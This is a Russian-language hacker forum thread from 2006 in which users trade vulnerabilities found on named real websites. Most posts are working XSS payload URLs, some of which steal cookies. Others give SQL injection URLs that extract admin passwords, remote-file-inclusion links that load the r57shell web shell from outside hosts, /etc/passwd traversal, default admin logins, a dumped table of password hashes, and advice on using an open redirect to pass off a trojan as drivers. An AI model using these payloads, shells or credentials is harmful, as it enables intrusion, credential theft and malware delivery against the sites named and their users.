Просмотр полной версии : Баги на сайтах.
Очень часто создаются темы типа: Нашел XSS, Нашёл SQL injection. Уже немного надоело. Предлагаю всем найденные вами баги (если вам не терпится показать этот баг всем) постить в эту тему, чтобы не засорять форум!
UPD: никаких рефереров! все линки даем исключительно так _http://
http://www.generis.ru/?page=press_wholenews&id='
http://www.integracija.gov.lv/forum/?setc=1&forumid='
http://www.mossei.ru/?page='
Вот для начала
Идея хорошая принципы .
_www.pansionmsu.ru , в строке поиска <script>alert()<script>
_http://msu.ru/ , в строке поиска , <script>alert()<script> не вышел , а <marquee>msu</marquee> выходит .
_http://online.ua/ Строка поиска , <marquee>UA</marquee> , <img src="http://www.online.ua/all/0.gif"> покажет свой собственный логотип который в верхнем левом углу .
_http://referat.star-info.ru
В поиске если написать <i>i</i> то будет так
Warning: eregi_replace(): REG_EMPTY in /usr/home/www/user/referat.star-info.ru/inc/func on line 73
www.supersait.net.ru/billing/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
сам сайт supersait.net.ru нечего из себя не представляет, зато он хостится на очень известном хостинге, до которого можно добраться используя багу в phpcoin.
Тоесть благодаря php include мы можем выполнять никсовые комманды (ls;pwd;echo;cat) на сервере.
_http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Ci%3Ei%3C%2Fi%3E&method=exact
В графе поиск статьи <script>alert()</script>
Справочник телефонов города Орла
http://www.g-play.ru/orel/
"Поиск организаций по названию, виду деятельности:"
В поиске <script>alert()</script>
Еще .
1)
url : _http://prohosting.fatpickle.com/search
<script>alert()</script> в поиске .
2)
Url: _http://www.babr.ru/index.php?pt=pages
<script>alert()</script> в поиске .
3)
url : _http://www.ambercity.ru/
<script>alert()</script> в поиске .
1)
Url :_http://www.cityvision2000.com
Можно узнать путь установки .
В поиске <script>alert()</script>
"D:\Webs\city\www\search.cgi": No such file or directory
2)
url: _http://www.pages.ru/
Поиск <script>alert()</script>
_http://zna.nu/vg_eng.php?id='
Интересный сайт :)
Url : _http://xss.mask.ru/
В поиске <script>alert()</script>
Url : _http://www.miit.net
<script>alert()</script> В поиске
XSS-уязвимости
1. _http://www.ruslink.de/cgi-bin/search.pl XSS1 - "<script>alert()</script>" в строчке поиска.
2. _http://links.keraben.ru/search.php XSS2 - "<script>alert()</script>" в строчке поиска.
3. _http://www.send.ru/search/index.html XSS3 - "<script>alert()</script>" в строчке поиска.
4. _http://coda.net.ru/index.php XSS4 - "<script>alert()</script>" в строчке поиска.
5. _http://www.zlinks.ru/search.php XSS5 - "<script>alert()</script>" в строчке поиска.
•••™NO FEAR™•••
07.03.2006, 19:56
XSS-уязвимости
1. _http://www.ruslink.de/cgi-bin/search.pl XSS1 - "<script>alert()</script>" в строчке поиска.
2. _http://links.keraben.ru/search.php XSS2 - "<script>alert()</script>" в строчке поиска.
3. _http://www.send.ru/search/index.html XSS3 - "<script>alert()</script>" в строчке поиска.
4. _http://coda.net.ru/index.php XSS4 - "<script>alert()</script>" в строчке поиска.
5. _http://www.zlinks.ru/search.php XSS5 - "<script>alert()</script>" в строчке поиска.
И толку от них? Это пасивные XSS.
max_pain89
07.03.2006, 23:18
http://icq.rambler.ru/popup.html?ipath=<script>alert()</script>
=) Люблю Аську.
_http://www.nne.ru/news.php?id=1429'<script>alert(/nexwill/)</script> Гы ))))) :D :D
На __http://www.nne.ru Xss еще в поиске .
_http://www.flirtshop.ru/search.xhtml?sea_text=%3Cscript%3Ealert%28%22Vanda l%22%29%3C%2Fscript%3E&-action.search=1
seeattact
11.03.2006, 00:33
http://dimon.kanet.ru/members.php?sortby=%3Ciframe%20src=http://antichat.ru%20%3C
xss..
1. _http://www.infopiter.ru/cgi-bin/catalog/catalog.cgi?action=search&fil=1&Keywords=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&poisk=word
2. _http://list.emy.ru/search.php?keyword=%3Cscript%3Ealert%28%29%3C%2Fsc ript%3E&opt=0&x=26&y=9
3. _http://www.fromatoz.ru/catalog/search/?searchQuery=%3Cscript%3Ealert%28%29%3C%2Fscript%3 E
4. _http://links.vestor-ru.ru/0.html?s=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
5. _http://catalog.a-les.ru/index.php?ac=search / в поиске <script>alert()</script>
_http://avtoprice.com/cgi-bin/search.pl
Поиск : <script>alert()</script>
_http://www.autobriz.ru/cgi-bin/catalog-find.pl?CMD=FIND&WORDS=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
Вот ловите
http://www.hithost.ru/cgi-bin/game_1_10.cgi?sid=5668431270%22%3E%3Cscript%3Ealer t(document.cookie)%3C/script%3E%3Cb%20src=%22
может тому кто сайт расскручивает и пригодиться, d1mon - это тебе )) ггг..
XSS
Поисковая система KM.RU
_http://go.km.ru/index.asp?idr=0&ids=&wdv=0&mrv=1&dti=0&dtv=3&idt=&ann=1&srt=0&itp=-1&osq=&P1=&P2=&P3=&ext=0&opt=0&hlp=0&sr=0&sq=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
РИА Новости
_http://www.rian.ru/search/?query=%22%3Esa%3Cscript%3Ealert%28%29%3C%2Fscript %3E&x=8&y=1
Lenta.ru
_lenta.ru в поиске: "><script>alert ()</script>
ГАЗПРОМ.ру
_http://www.gazprom.ru/cgi-bin/htsearch - в поиске: "><script>alert ()</script>
Болеро.ру
_http://www.bolero.ru в поиске: "><script>alert ()</script>
CyberFight.ru
_http://cyberfight.ru/info/search/?qry=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&mode=simple
kino.ru
_http://www.kino.ru/search.php - в поиске: <script>alert ()</script>
РБК
_http://av.rbc.ru/?query=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&type=&morph=on&cat=&d1=13&m1=02&y1=2006&d2=13&m2=03&y2=2006&howmany=10&sort=date
XSS
Сайт Правительства России (government.ru)
_http://www.government.ru - в поиске: "><script>alert ()</script>
Rambler: Фото
_http://foto.rambler.ru - в поиске: "><script>alert ()</script>
Правда.ру
_http://pravda.ru - в поиске: "><script>alert ()</script>
Referat.com
_http://links.referat.com/?hp=0&st=%3Cscript%3Ealert+%28%29%3C%2Fscript%3E
RuPay.ru
_http://rupay.ru - /подписка на новости/ - /ваш email/ - вписываем туда: "><script>alert ()</script>
Ren-TV.com
_http://ren-tv.com - /поиск/ - "><script>alert ()</script>
VolkIncor
16.03.2006, 17:34
1)http://www.strelna.org.ru/main.php?page=http://casperskyj.narod.ru/r57shell.txt
2)http://sync.te.ua/index.php?page=http://casperskyj.narod.ru/r57shell.txt
:eek: :eek: :eek: :confused: :confused: :confused:
VolkIncor
17.03.2006, 16:58
http://npunlimited.np.funpic.de/4images/register.php
Lovi ewe odin!!
_http://kinoshara.com/search.php?search=%3Cscript%3Ealert%28%29%3C%2Fscr ipt%3E
h16.ru
http://register.h16.ru/cgi-bin/sp.cgi?fqdn=%3Cscript%3Ealert()%3C/script%3E
XSS
прошелся по хостингам
Netco
_http://www.netco.ru - Зарегистрировать домен -> <script>alert ()</script>
Standarthost
_http://www.standarthost.ru - Проверка домена -> <script>alert ()</script>
[.m]masterhost
_http://masterhost.ru - Проверить домен -> "><script>alert ()</script>
Terrahost
_http://www.terrahost.ru/whois/whois.php?domain=%22%3E%3Cscript%3Ealert+%28%29%3C %2Fscript%3E&ru=on
MASTAK
_http://www.mastak.ru/Mwois/mwhois.php?domain=<script>alert%20()</script>
h16.ru
http://s.agava.ru/cgi/g.cgi?p=150&u=mail.ru
http://www.agava.ru/cgi/g.cgi?p=134&u=http://www.mail.ru
http://www.agava.ru/cgi/g.cgi?p=134...p://www.mail.ru
Уже посерьезнее, эту можно использовать для фишинга...
Как и предыдущую... Остальные бесполезны практически...
_http://kaiser.su/index.html?form='
_http://saratov.cityout.ru/search/?fastsearch=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&cat=0
Links (http://saratov.cityout.ru/search/?fastsearch=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&cat=0)
http://www.rrecord.ru/search.html?cat=0&keys=%3Cscript%3Ealert%28%27XSS%27%29%3C/scri (http://www.rrecord.ru/search.html?cat=0&keys=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E%3Cmarquee%3E%3Cfont%20size%3D+7%20color% 3Dgreen%3E%u0417%u0434%u0435%u0441%u044C%20%u0411% u042B%u041B%20%u0412%u0410%u041D%u0414%u0410%u041B %3C/marquee%3E)
_http://kaiser.su/index.html?form='
http://kaiser.su/index.html?form=index&href=223344&class=-5%20union%20select%201,concat(name,':',password),3 ,4,5,6,7,8,9,10,11%20from%20admin/*
_http://mail.goon.ru/reg/agreement.phtml?r1=103'&t1=%5C%22%5C%272&i=
http://wahack.org.ru/?sec=lib&ver=html&p=0&text=2'
max_pain89
31.03.2006, 23:06
http://www.gamershell.com/pc/gti_racing/screenshots.html?id=<script>alert()</script>
31.03.2006 20:11
Интернет-холдинг Рамблер начинает тестирование поиска изображений в Сети. Бета-версия нового поискового сервиса Рамблера подбирает по ключевым словам рисунки, фотографии и любые другие графические файлы, которые хранит Всемирная Паутина.
хорошее начало - http://www.rambler.ru/cgi-bin/pic.cgi?words="><script>alert(/VectorG/)</script>
багу нашёл около 3х недель назад
говорили с киборгом в мирке на счёт этого дела, итог: бага ниче не даёт... но всё равно интересная реализация:
http://afisha.yandex.ru/event.xml%00
http://money.yandex.ru/shops.xml%00
и так во многих xml яндекса, но не во всех...
podkashey
02.04.2006, 14:59
На http://ha.ckers.org/xss.html если ввести в поле:
HTML (with semicolons):
текст
%Wd
то выскакивает алерт, правда не понял почему и какая от этого польза.
http://www.coca-cola.kz/index.php?p='
http://www.ziv.ru/fmessages.asp?iid=><h1>HACKED</h1>
http://www.motor.md/bs.php
http://www.audit.by/rus/forum/
http://www.government.gov.ru/search/search.html?query="><script>alert('VectorG')</script>&page=1&book=0&he_id=38&pres_he_id=38
http://www.americasarmy.com/includes/bumper.php?goto="><script>alert('america_sucks')</script>
EST a1ien
03.04.2006, 09:09
http://sotoman.ru/forum/show_msg.php?postid=3457<script src=http://site.ru/script.js></script>
Надо писать без кавычек все кавычки фильтруются
http://www.stamps-shop.ru/news.php
http://www.annualreports.ru/load.php?link='
sql инъекция
Нагуглил тут немного
Если никому не пригодится - помидорами не бросаться
-----------------------------
_http://www.mff.org/publications/publications.taf?page=bebebe'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '(P1.ID=bebebe') ORDER BY 25 DESC'.
_http://www.archaeological.org/webinfo.php?page='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/aia/public_html/webinfo.php on line 11
_http://www.jedit.org/index.php?page=%00
_http://www.prestosoft.com/ps.asp?page=bebebe%00
_http://phppgadmin.sourceforge.net/?page=%00
_http://www.ourdocuments.gov/content.php?flash=false&page=%00
вдруг кто расковыряет?
_http://www.swrcb.ca.gov/rwqcb3/Admin/
вот еще - немного мыльников в зоне gov и может еще что-то чего я не разглядел
_http://www.agriya.com/demo/paidmail/admin/
_http://copyforsale.com/mail/
_http://www.software-trading.de/liste.asp?Titel=Backup&sql=WHERE(Kategorie%20IN('Backup'))%20--
_http://theory.lcs.mit.edu/~cis/cpl/backup.tar.gz
(не качал - не знаю)
----------------EOF------------------------
http://www.gamersinfo.net/content/news.php?id=168%20union%20select%201,password,user name,email,5,6,7,8,9%20from%20user%20limit%201,2/*
http://www.national-geographic.ru/forums/showthreaded.php?Cat=&Board=general&Number=-1480%20union%20select%20concat(u_email,':',u_passw ord),2,3%20from%20w3t_Users%20limit%205,6/*
http://www.rolemancer.ru/sections.php?op=listarticles&secid=-87%20union%20select%201,pass,3,4,uname%20from%20us ers/*
http://www.wargames.ru/sections.php?op=listarticles&secid=-87%20union%20select%201,uname,3,4,pass%20from%20us ers/*
http://www.echoekb.ru/news.php?r=2%20union%20select%201,2,user_pass,4,5, 6,7,8,9,0%20from%20forum_user/*
ТУТ (http://slovari.yandex.ru/redir?dtype=encyc&url=http://www.glossary.ru/cgi-bin/gl_sch2.cgi%3FRdrlqywo,lxqo%21ngw9mltt:l%21,gxyo.: ) вход в админку slovari.yandex.ru .... нужен только логин и пасс)))
_http://www.malls.ru/index.cfm?error=%3Cscript%3Ealert(/AC%20team/)%3C/script%3E%3Cfont%20color=green%3EAC%20TEAM%20%3C/font%3E
Сцыла (http://www.malls.ru/index.cfm?error=%3Cscript%3Ealert(/AC%20team/)%3C/script%3E%3Cfont%20color=green%3EAC%20TEAM%20%3C/font%3E)
http://www.poishi.com/search.html?text=%3Cscript%3Ealert%28%27AC+TEAM%27 %29%3C%2Fscript%3E
podkashey
12.04.2006, 15:09
Для СИ покатит, да и не только
http://www.nvidia.com/content/license/location.asp?url=а_тут_пишем_то_что_ хотим_загрузить
Дальше юзеру останется нажать кнопку согласия... Можно впарить трояна под видом драиверов от нВидеа очень новых и хороших... А еще лучше это дрова склеенные с трояном, лежащие на каком-нить сайте... Вобщем можно придумать...
_http://svn.matroska.org/svn/
_http://vision.rambler.ru/srch/?sort=0&set=vision&words="><script>alert(/VectorG/)</script>
seeattact
17.04.2006, 13:44
http://pdasite.net.ru/?a=1&s=cyberlife.ru/redirect.php?http://inattack.ru
http://www.tshirtwars.com/sources/functions.php?root_path=http://rst.void.ru/download/r57shell.txt?
_http://www.fo-ma.ru/view.php?id=83661&img=%3Cscript%3Ealert(document.cookie)%3C/script%3E
haZard0us
25.04.2006, 17:27
_http://vision.rambler.ru/srch/?sort=0&set=vision&control_charset=%CA%EE%ED%F2%F0%EE%EB%FC&words=%22%3E%3Cscript%3Ealert%28document.cookie%29 %3C%2Fscript%3E
_http://www.hedegaard.nu/image/set.php
_http://www.aleviler.biz/hpmaker/index.php?p=http://rst.void.ru/download/r57shell.txt?
_http://www.hedegaard.nu/image/set.php
Шелл тут прикольный .Я думал все юзают r57shell 124
censored!
28.04.2006, 18:55
http://suncity.combats.ru/enter.pl?step=1&add=1&login='><script>alert(/testing_by_censored!/)</script>>
http://capitalcity.combats.ru/enter.pl?login="><script>alert(/testing_by_censored!/)</script>&step=2&reminder=1234567
----------
http://rrc.territory.ru/register1.php?next=1&code=&num=&edit%5BNICK%5D="><script>alert(/testing_by_censored!/)</script>
http://rrc.territory.ru/error.php?msg=Внимание!%20Всем%20иг окам%20надо%20пройти%20заново %20систему%20регистрации!%20p.s. Проходить%20ее%20надо%20на%20anti chat.ru%20=)
----------
http://forum.siemens-club.ru/member.php?Action=viewprofile&username=<script>alert(/testing_by_censored!/)</script>
_http://www.schooljournals.net/index.php?output=CommentsPage(PHP CODE)
exmpl:
_http://www.schooljournals.net/index.php?output=CommentsPage(phpinfo())
Стоит фильтрация на все спецсимволы. Как обходить - читаем http://forum.antichat.ru/thread18219.html
degeneration x
29.04.2006, 09:42
http://sportmaster.ru/roz.php?cat_id=19413&from=-60
degeneration x
29.04.2006, 09:44
http://www.mirt-service.ru/constructor.php?manufacturer=1'
http://mp3plus.ru/album.php?id=4796&art=1247'
только что, случано нашел (работает только в IE)
_http://www.yandex.ru/yandsearch?text=gLAnce_was_here&stype="><script>alert('found_by_gLAnce')</script>
_http://images.yandex.ru/yandsearch?rpt="><script>alert('found_by_gLAnce')</script>&text=xaxa
делаемся так. Знаю что некоторые XSS уже выкладывали но всетаки удобно когда все собрано в одно место
XSS НА ИЗВЕСТНЫХ RUSS-ПОИСКОВИКАХ
Yandex.RU - Internet Explorer
_http://www.yandex.ru/yandsearch?text=gLAnce_was_here&stype="><script>alert('found_by_gLAnce')</script>
_http://images.yandex.ru/yandsearch?rpt="><script>alert('found_by_gLAnce')</script>&text=xaxa
_http://news.yandex.ru/yandsearch?rpt=nnews2&grhow=clutop&text=sasa&doSearch="><script>alert('found')</script>
Rambler.RU
_http://www.rambler.ru/db/news/msg.html?mid='"><script>alert('found_by_gLAnce')</script>
_http://weather.rambler.ru/index.html?search=<script>alert('found_by_gLAnce')</script>
_http://tv.rambler.ru/index.html?channel_id="><script>alert('found_by_gLAnce')</script>
_http://foto.rambler.ru/srch?control_charset=huy&sort=0&set=photo&words="><script>alert('found_by_gLAnce')</script>
_http://horoscopes.rambler.ru/day.html?day=1%22%3E%3Cscript%3Ealert%28%27found_b y_gLAnce%27%29%3C%2Fscript%3E&month=4&year=1965&gender=f
_http://www.rambler.ru/db/news/news.html?s="><script>alert(found_by_gLAnce)</script>
_http://cla.rambler.ru/?action=login&error[l_login][value]=privet"><script>javascript:alert(document.cookie)</script>
_http://olymp2006.rambler.ru/winners.html?day=http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert(/XSS/)%3C/script%3E
KM.RU
_http://go.km.ru/index.asp?idr=4&ids=&wdv=0&mrv=1&dti=0&dtv=6&idt=&ann=1&srt=0&itp=2&osq=%3Cscript%3Ealert+%28found_by_gLAnce%29%3C%2Fs cript%3E&P1=&P2=&P3=&ext=0&opt=0&hlp=0&sr=0&sq=%3Cscript%3Ealert+%28%27found_by_gLAnce%27%29%3 C%2Fscript%3E
_http://conference.km.ru/add_question.asp?id="><script>alert('found_by_gLAnce')</script>
вобщем на км.ру полно css, все писать сюда не буду
Aport.RU
_http://www.aport.ru/help/?p="><script>alert%20('found-by-gLAnce')</script>
_http://ec.aport.ru/scripts/template.dll?r="><script>alert%20('i_vot_tak_vot')</script>&That=goods&Base=eshop&Rt=2&Tn=
_http://sm.aport.ru/scripts/template.dll?That=std&r=\"><script>alert%20(/found_by_gLAnce/)</script>
haZard0us
30.04.2006, 17:32
http://www.mon.gov.ua
вбиваем в поиск "><script>alert(document.cookie)</script> и наслаждаемся резалтом :)
http://www.mon.gov.ua/phpbb/docs/ -- смотрим резалт (для ленивых -
Warning: Failed opening 'phpbb/docs//main.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/spool/www.mstu.gov.ua/main.php on line 205) ),
немного подумав уже наталкивает на мысли =)
KaMiKadZe
01.05.2006, 11:02
_http://www.hedegaard.nu/index.php?p=http://k1on.nm.ru/conf.php сс что спер чей то шелл своего нету)))
_http://wordstat.yandex.ru/advq?rpt=ppc&shw="><script>alert%20(/found_by_gLAnce/)</script>
_http://www.plati.ru/asp/pay.asp?id_d=11111&searchstr=sa&agent="><script>alert('found_by_gLAnce')</script>
_http://www.plod.ru/search.php?search=%3Ch1%3ETEST%20AC%20TEAM%20%3C/h1%3E3E&x=0&y=0
http://www.fws.gov/webblogs/arlingtonChat/viewblog.php?id=*
Xss на rapidshare.de
http://rapidshare.de/en/forgotpw.html
Не фильтруется поле email.
POST rapidshare.de/cgi-bin/forgotpw.cgi HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: rapidshare.de
Content-Length: 65
Connection: Close
Pragma: no-cache
email=<script>alert('XSS')%3B</script>
трахающиеся невесты.. только толку 0
_http://officegirls.ru/cgi-bin/showpic.cgi?act=show&pg=2&id=<script>alert('opa ;-) by cy4_')</script>&ctg=Brides&c=2
__http://antharas.ru/?id=95&lo=1&hi='
__http://antharas.ru/?id=95&mid=12081'
__http://www.uinzz.com/stat/click.php?http://www.yandex.ru/ (думаю для фишеров полезно будет)
__http://dkcs.void.ru/index.php?module=read&action=0 (даж не баг, просто улыбнуло)
__http://www.truckmaster.ru/catalog.phtml?dir=1&subdir=6'
Xss на icq.rambler.ru
Не фильтруются: ipath, iname, alt,
_www.icq.rambler.ru/popup.html?ipath="><script>alert('XSS')%3B</script>&iname=%2Fimages%2F184_64%2E1141153413%2E19621%2Egi f&width=535&height=240&alt=%C0%F3%E4%E8%EE-Xtraz
Вроде еще не выкладывали.
_http://www.securitylab.ru/bitrix/redirect.php?event1=gateway_click&event2=news&event3=266774&goto=http://ya.ru/
небольшая уловка для фишеров...
__http://www.office-tnt.ru/staff/workers/?8131'
чё то меня на тнт потянуло...
XSS
оплатна.info
http://www.oplata.info/delivery/inf_purse.asp?id_i=615238&wm_id=111111111111&ninv=15730705&rnd="><Script>alert('found_by_gLAnce')</script>
http://www.bstu.by/test_results.php?test_id=1&pass_ser=<h1>xss1</h1>&pass_num=<h1>xss2</h1>&subject_id=0
max_pain89
06.05.2006, 22:27
http://www.australia.gov.au/admin/
это не баг, а ошибка... просто улыбнуло
Rupay.ru
https://rupay.com/status.php?st_id="><script>alert('found_by_gLAnce')</script>
http://_geograd.ru/index.php?page=../../../../../../../../../../etc/passwd%00
__http://www.philos.msu.ru/library.php?sid=11'
ЗЫ В МГУ сервер на винде)
_http://www.style2ouf.com/us/News/affiche_news.php?id_news=527'
_http://www.style2ouf.com/us/News/result.php?genre=1&nom=20-5-2006'
max_pain89
08.05.2006, 18:11
_http://www.rolemancer.ru/article.php?sid=-1+union+select+1,2,3,uname,pass,email,7,8,9,10,use r_icq+from+users+limit+2,1/*
http://rtf-club.ru/forum/misc.php?do=page&template={${include(%27http://dia.forever.kz%27)}}
podkashey
11.05.2006, 22:28
Еще одна пассивная никому не нужная ксс http://www.hansaworld.com/WebHBSDivMain.hal?langcode=ru%22%3E%3Cscript%3Eale rt(/hui/)%3C/script%3E&WEBPAGE=
_kREveDKo_
11.05.2006, 23:32
http://www.myim.ru/index.php?m=<h1>xss
podkashey
12.05.2006, 01:02
http://www.nazarov-av.ru/admin/
l/p: admin/admin
www.poshivka.ru/..../nc.php (http://www.poshivka.ru/.system/extensions/librarys/nc.php)
http://www.poshivka.ru/.system/extensions/librarys/nc.php
# Дамп данных таблицы `LCMS_USERS`
#
INSERT INTO LCMS_USERS VALUES ('root', '3692a3997fc0a011762f2d9feed9d268', 2, '0', '6d394f489c392c9d91913fb9c0ea7336', 1105535093, 1);
INSERT INTO LCMS_USERS VALUES ('mxms', '3692a3997fc0a011762f2d9feed9d268', 2, '0', 'a77bf438f56b5ca6962c0ffd1dfbf14d', 1104407014, 1);
INSERT INTO LCMS_USERS VALUES ('larry-admin', 'cddf1c37e2d4c2cc51a9f0b194150175', 2, '0', NULL, 0, 1);
INSERT INTO LCMS_USERS VALUES ('rooter', '9220e3b9047f78cd7615931ab76cba10', 16, '0', '996c5d54d3139b7a3702b2ff5ae445c0', 1102425199, 1);
INSERT INTO LCMS_USERS VALUES ('test', '098f6bcd4621d373cade4e832627b4f6', 16, '0', '6b5c80c4ef8f583b73bd2bac73d14e28', 1102425450, 1);
INSERT INTO LCMS_USERS VALUES ('relict', '5a315f8ec5a19d1b6bdd905d2cd0e7a1', 16, '0', '45c588311a91fed253abbea751b48539', 1102426254, 1);
INSERT INTO LCMS_USERS VALUES ('teste', '698dc19d489c4e4db73e28a713eab07b', 16, '0', 'a7be86787110f400c91f64c2aed356ac', 1103703057, 1);
INSERT INTO LCMS_USERS VALUES ('zero', 'd02c4c4cde7ae76252540d116a40f23a', 16, '0', NULL, 0, 1);
__http://www.nuke-tops.ru/index.php?module=gallery&file=disp_serie&id_album=9 OR 10
hntp://www.hackers.nl/artikelwip.php?id=633%20%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
Полный дебилизм на сайтах, провайдеров в этой зоне имеет место быть.
_http://vbulletin.net.ru/index.php/"><script>alert(document.cookie)</script>
выкладываю заволявшийся приват :)
sql OLE BD _http://www.acusis.com/SearchFiles.asp?search='&mode=anywords
_http://terrier.ru/produkt.php?t=sub_pages&cat=3'
_http://vzxk.ru/index.php?url=http://gbl.nightmail.ru/rst.php
забавно Disable functions : dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit.
VectorG у тебя где то видел похожую шляпу, что нибудь сделал с этим?
Может и все знают, на когда я увил мне стало интересно- это глюк или просто ошибка, или так задумано.
Когда проводится регистрация нового пользователя на forum.antichat.ru, после регистрации, если не сделать активацию пользователя можно просмотреть скрытый раздела форума Public exploits, после активации раздел не виден.
И на последок:
_hxxp://www.kopalin.com/remview.php
_hxxp://www.bitacs.ru/.system/extensions/librarys/nc.php
_hxxp://nhackhuctinhyeu.5gigs.com/tr.php
_hxxp://www.netsell.kz/forums/misc.php?do=page&template={${phpinfo()}}
_hxxp://johnny.ihackstuff.com/index.php?module=prodreviews
p.s А самое обино, скоро лето а меня колбасит(ангина замучила!)
http://www.steven-gerrard.net/index02.htm во y@ раньше такого небыло!
_http://keep4u.ru/album.php?view=%27
_http://retvshowcase.com/fileupload/store/re.php
dinar_007
15.05.2006, 18:03
_http://baby.chg.ru/cgi-bin/articledb/article.cgi
В строке поиска:
<script>alert('tested_by_Sa-D_007');</script>
_http://narod.yandex.ru/filemanager/rename.xhtml?f="><script>alert(document.cookie)</script>
_http://www.baset.cz/index.php?p_stranka=vypis.php&p_od=1&
VectorG у тебя где то видел похожую шляпу, что нибудь сделал с этим?да было дело...
я админам vbulletin.net.ru ещё около недели назад сказал о баге, так они слюни как бабы распустили и забанили, вообще теперь х*й кому из админов говорить буду...
_http://3sute.trei.ro/upload/re.php
_http://hossam.glwb.info/linkman101/index.php
pass: admin
*Chakir*
15.05.2006, 21:38
_http://greenhodge.net/g/404_error.php
_http://ukrlit.clawz.com/text.php?f=..../../etc/passwd
_http://www.geocode.com/modules.php?n...c/passwd&pre=y
_http://buddhafiguren.de/etc/
_http://www.igromania.ru/games/?666'567
_http://www.ext.ru/?id=7"><script>alert()</script>
_http://www.newstrack.ru/newstrack3/portal/news/view/20050414/a/
_http://www.mobiteka.ru/melodies/melodies.shtml?artid=27'
_http://referat.na5.ru/load.php?id=504948'
_http://referat.apple-online.ru/index.php?type=diplom_1&id=3478'
_http://www.3a.kiev.ua/good.php?name=<script>alert()</script>
_http://catalog.begun.ru/?q="><script>alert()</script>
_http://7000.ru/computers/details.php?id=2'
_http://sofit.com.ua/rus/asearch/0/1/0/?ser_mid=-1&go_search=1&q_search="><script>alert()</script>
Вроде нормально надо еще будет просите!
_http://www.evrey.com/sitep/list/index.php3?menu=http://rst.void.ru/download/r57shell.txt?
_http://www.surnameroundup.com/paxguestbook/templates/url.php
_http://50mb.glwb.info/store/re.php
*Chakir*
16.05.2006, 08:09
_http://www.paladins.ru/znaxar.php?free="><script>alert(1)</script>&sila1=3"><script>alert(2)</script>&lovk1=3"><script>alert(3)</script>&intuiz1=3"><script>alert(4)</script>&vinos1=12"><script>alert(5)</script>&intel1="><script>alert(6)</script>&mudr1="><script>alert(7)</script>&sila2="><script>alert(8)</script>&lovk2="><script>alert(9)</script>&intuiz2="><script>alert(10)</script>&vinos2="><script>alert(11)</script>&intel2="><script>alert(12)</script>&mudr2="><script>alert(13)</script>&flag=2"><script>alert(14)</script>
_http://horoscopes.rambler.ru/day.html?day=1<script>alert(1)</script>&month=4&year=1965<script>alert(2)</script>
_http://blog.msk.ru/login.php?login=<script>alert()</script>&pass=&subm
it=OK
*Chakir*
16.05.2006, 14:31
_http://www.film.ru/search.asp?what="style=background:url(javascript:alert());"&a
mp;where=root&mode=medium
_http://smchat.ru/?s=reguser&login="><script>alert()</script>
_http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script>
_http://encycl.accoona.ru/?word=<script>alert()</script>
_http://hw.ru/hi-tech/Login.jsp?login='"><script>alert(1)</script>&password='"><script>alert(2)</script>
_http://www.srb.ru/search-results/?q="><script>alert()</script>&m=all&wm=wrd&ps=10&page=0
_http://www.w3.org/Search/Mail/Public/search?keywords=&hdr-1-name=subject&hdr-1-query="><script>alert(1)</script>&index-grp=Public__FULL&index-type=t&type-index="><script>alert(2)</script>
XSS
_http://www.z-team.net.ru/?id=utilit_whois в поиске доменов
_http://mirsofta.ru/ в поиске
_http://humanoid.ru/chat/install.php
_hxxp://chinaeveryday.ru/RU/
XSS:
_http://hp.qsrch.com/apps/eps/eps.cgi?prt=hp03&uuid=67b0795864c9d6f84de322f426cc8788&s=%3Cscript%3Ealert%28%27JS%27%29%3C%2Fscript%3E&submit=Go
_http://hp.qsrch.com/apps/eps/eps.cgi?Keywords=%3Cscript%3Ealert%28%27JS%27%29%3 C%2Fscript%3E&loc=ST&upartner=hp03&ps=H3OTUSER
*Chakir*
17.05.2006, 07:52
_http://www.pentagon.gov/srch/search?template=/search/results-template-dl.html&c=A3B245203F9EBEC5FC8C306E4AAF152F&c=8268333F54379065&c=6FDF5BD0BF338D19&c=1DA2190B5E9F39D2&q=666&submit=Search&sort=-pub_date'
Пентагон
_http://sources.ru/cgi-bin/sources/search/search.cgi?stpos=0&query=<script>alert()</script>&stype=AND
_http://www.tug.org/PSTricks/main.cgi?search=<script>alert()</script>&search=Search
Сайт qmp3, xss:
_http://www.qmp3.ru/search.php?string=%3Cimage+style%3Dbackground%3Aur l%28javascript%3Aalert%28%2FSLIP%2F%29%29%3E&st=all
podkashey
18.05.2006, 02:58
Сайт про рыжих... ;)
http://redpeople.org/plug.php?e=gal&pic=136%27
back0rifice
18.05.2006, 07:28
_http://www.crpg.ru/sections.php?op=listarticles&secid=375(
_http://www.crpg.ru/sections.php?op=viewarticle&artid=1539(
XSS на xss.ru
GET http://ip.xss.ru/header.php HTTP/1.1
Accept: */*
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
Host: ip.xss.ru
Keep-Alive: 300
User-Agent: <IMG SRC="javasCript:alert('User-Agent - client side script works!!')">
Via: <IMG SRC="javasCript:alert('Via - client side script works!!')">
Referer: <IMG SRC="javasCript:alert('Referer - client side script works!!')">
Yandex
http://search.yaca.yandex.ru/yandsearch?text=url%3D%22www.antichat.ru*%22&rpt="><script>alert("found_by_Glance")</script>
XSS В Апорте:
_http://sm.aport.ru/scripts/template.dll?That=std&r=LOL"><script>alert(/SLIP/)</script>
XSS AltaVista:
